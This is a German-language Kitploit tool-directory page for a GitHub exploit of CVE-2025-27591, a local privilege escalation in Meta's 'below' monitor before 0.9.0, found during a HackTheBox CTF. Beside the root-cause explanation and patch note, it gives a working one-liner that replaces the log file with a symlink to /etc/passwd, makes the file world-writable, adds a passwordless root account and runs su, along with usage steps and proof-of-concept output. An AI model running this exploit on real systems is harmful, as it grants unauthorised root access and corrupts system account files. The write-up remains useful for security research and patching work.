Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/rippsec/cve-2025-27591-meta-below-lpe
Privilege EscalationSchwachstellenanalyseExploitationLaterale BewegungCTFBinary-Exploitation
GitHubrippsec/cve-2025-27591-meta-below-lpe

CVE-2025-27591-Meta-below-LPE

CVE-2025-27591 – Meta below symlink following lokale Privilegienausweitung (HackTheBox CTF)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 MonatenNoch nicht geprüft

CVE-2025-27591 — Meta below Symlink Lokale Privilegieneskalation

Übersicht

FeldDetails
CVECVE-2025-27591
SoftwareMeta below (Systemressourcenmonitor)
Betroffene Versionen< 0.9.0
SchwachstelleSymlink-Verfolgung → beliebiges Dateiüberschreiben als root
AuthentifizierungLokaler Benutzer mit sudo-Zugriff auf below
AuswirkungLokale Privilegieneskalation zu root
KontextEntdeckt während eines HackTheBox CTF

Beschreibung

Das Systemressourcen-Überwachungstool below (von Meta Platforms, Inc.) enthält einen Fehler in seinem Fehlerprotokollierungsmechanismus. Wenn es über sudo aufgerufen wird, setzt es zwangsweise Berechtigungen 0666 für seine Protokolldateien in /var/log/below/, ohne zuvor zu prüfen, ob der Zielpfad ein Symlink ist. Dies erlaubt einem lokalen Angreifer, die Protokolldatei durch einen Symlink zu ersetzen, der auf eine beliebige root-beschreibbare Datei verweist, und diese effektiv mit kontrolliertem Inhalt zu überschreiben.

Technische Details

Ursache

Der Protokollierungscode in below < 0.9.0 führt diese Operationen sequenziell aus, wenn er als root ausgeführt wird:

  1. Ermittelt den Protokollpfad: /var/log/below/error_root.log
  2. Erstellt oder öffnet die Datei
  3. Ruft chmod(path, 0o666) auf — ohne zu prüfen, ob es ein Symlink ist
  4. Schreibt die Fehlermeldung in den Pfad

In Schritt 4, wenn der Pfad vor der Ausführung durch einen Symlink ersetzt wurde, erfolgt das Schreiben stattdessen auf das Ziel des Symlinks.

Exploitation Chain

root@kitploit:~
Lokaler Benutzer
    │
    ▼
Entferne /var/log/below/error_root.log
    │
    ▼
Erstelle Symlink: /var/log/below/error_root.log → /etc/passwd
    │
    ▼
Löse Fehler aus mit: sudo /usr/bin/below replay --time "invalid"
    │  (below öffnet die "Protokolldatei", chmod 0666 trifft /etc/passwd, schreibt Fehler)
    ▼
/etc/passwd ist jetzt weltweit beschreibbar
    │
    ▼
Füge unechten root-Eintrag hinzu: rooted::0:0:root:/root:/bin/bash
    │
    ▼
su rooted → root-Shell

Warum --time "invalid" funktioniert

Die Übergabe einer ungültigen Zeitzeichenfolge zwingt below, eine Fehlermeldung zu protokollieren. Der Fehlerpfad erreicht den Protokollierungscode, der blind in die Datei schreibt, die jetzt unser Symlink ist.

Verwendung

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Voraussetzung: Der aktuelle Benutzer muss sudo-Rechte haben, um /usr/bin/below auszuführen.

Einzeiler

root@kitploit:~
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted

Proof of Concept

root@kitploit:~
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root

Patch

Die Schwachstelle wurde in below Version 0.9.0 behoben. Der Fix führt eine Symlink-Prüfung vor allen Dateioperationen im Protokollierungspfad ein.

Referenzen

  • NVD Entry
  • Meta below GitHub
Tool herunterladen